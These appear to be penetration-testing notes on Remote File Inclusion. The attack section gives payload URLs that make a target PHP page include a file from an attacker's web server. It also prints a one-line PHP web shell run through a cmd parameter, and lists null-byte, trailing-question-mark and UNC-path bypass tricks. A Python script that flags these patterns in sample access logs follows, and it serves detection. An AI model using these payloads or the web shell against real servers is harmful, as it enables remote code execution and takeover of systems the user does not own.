RFI - Remote File Inclusion
See PG Practice SLORT for uploading a PHP reverse shell that executes simultaneously on Windows!
https://securityxploded.com/remote-file-inclusion.php
Less common than LFI because the server has to be configured to allow remote includes, but ALWAYS CHECK for it if you found an LFI.
Test payload:
http://10.11.0.22/menu.php?file=http://10.11.0.4/evil.txt
If the include is remote, the result is an incoming connection from the target on an nc listener on your host.
Exploiting:
Host a file containing PHP code on your web server:
kali@kali:/var/www/html$ cat evil.txt
<?php echo shell_exec($_GET['cmd']); ?>
kali@kali:/var/www/html$ sudo systemctl restart apache2
Call it with the RFI payload, passing the command in the cmd parameter:
http://10.11.0.22/menu.php?file=http://10.11.0.4/evil.txt&cmd=ipconfig
Tricks:
Append a null byte (%00) to terminate the string and bypass a file-type restriction (for example a .php suffix the application appends); note this only works on old PHP versions, as newer ones reject null bytes in include paths.
Append a ? to the end of the payload so anything the application appends is treated as the query string of the remote URL, as if there were no suffix at all.
If http is blocked, try an SMB (UNC) link instead.
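From the defender's side, the payload shapes above (a URL scheme or UNC path in an include parameter, a %00 terminator, a trailing ?) are easy to spot in web server logs. The following detector is an added example, not part of the original notes; it assumes Apache/nginx combined-format access logs and a hypothetical list of parameter names used for includes, and runs over constructed sample lines.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (combined format); not real traffic.
SAMPLE_LOG = """\
10.11.0.4 - - [01/Jan/2024:10:00:00 +0000] "GET /menu.php?file=about.php HTTP/1.1" 200 512
10.11.0.4 - - [01/Jan/2024:10:00:01 +0000] "GET /menu.php?file=http://10.11.0.4/evil.txt&cmd=ipconfig HTTP/1.1" 200 88
10.11.0.4 - - [01/Jan/2024:10:00:02 +0000] "GET /menu.php?file=http://10.11.0.4/evil.txt? HTTP/1.1" 200 88
10.11.0.4 - - [01/Jan/2024:10:00:03 +0000] "GET /menu.php?file=..%2F..%2Fboot.ini%00 HTTP/1.1" 200 33
10.11.0.4 - - [01/Jan/2024:10:00:04 +0000] "GET /menu.php?file=%5C%5C10.11.0.4%5Cshare%5Cevil.txt HTTP/1.1" 500 0
"""

# Request line: method, target, protocol.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# Any URL scheme (http://, ftp://, php://, ...) or a UNC path (\\host\share),
# which Windows resolves over SMB without any PHP stream wrapper.
REMOTE_RE = re.compile(r'^(?:[a-z][a-z0-9+.-]*://|\\\\)', re.IGNORECASE)
# Hypothetical parameter names used for includes; tune to the application.
INCLUDE_PARAMS = {"file", "page", "include", "path", "template"}


def classify_param(value):
    """Return the list of RFI/LFI indicators found in one decoded parameter value."""
    findings = []
    if REMOTE_RE.match(value.lstrip()):
        findings.append("remote-include")
    if "\x00" in value:                    # %00 terminator trick
        findings.append("null-byte")
    if value.rstrip().endswith("?"):       # trailing-? suffix-neutralising trick
        findings.append("trailing-question-mark")
    return findings


def scan_log(text):
    """Return (request_target, param_name, findings) for each suspicious request."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = m.group(1)
        # parse_qsl percent-decodes values, so %00 becomes a real NUL byte.
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            if name.lower() in INCLUDE_PARAMS:
                findings = classify_param(value)
                if findings:
                    hits.append((target, name, findings))
    return hits


if __name__ == "__main__":
    for target, name, findings in scan_log(SAMPLE_LOG):
        print(f"{', '.join(findings):40s} {name}= in {target}")
```

Only the include parameters are inspected, so the cmd=ipconfig argument is not itself flagged; correlate the hit with outbound connections from the web server to confirm the include was actually fetched.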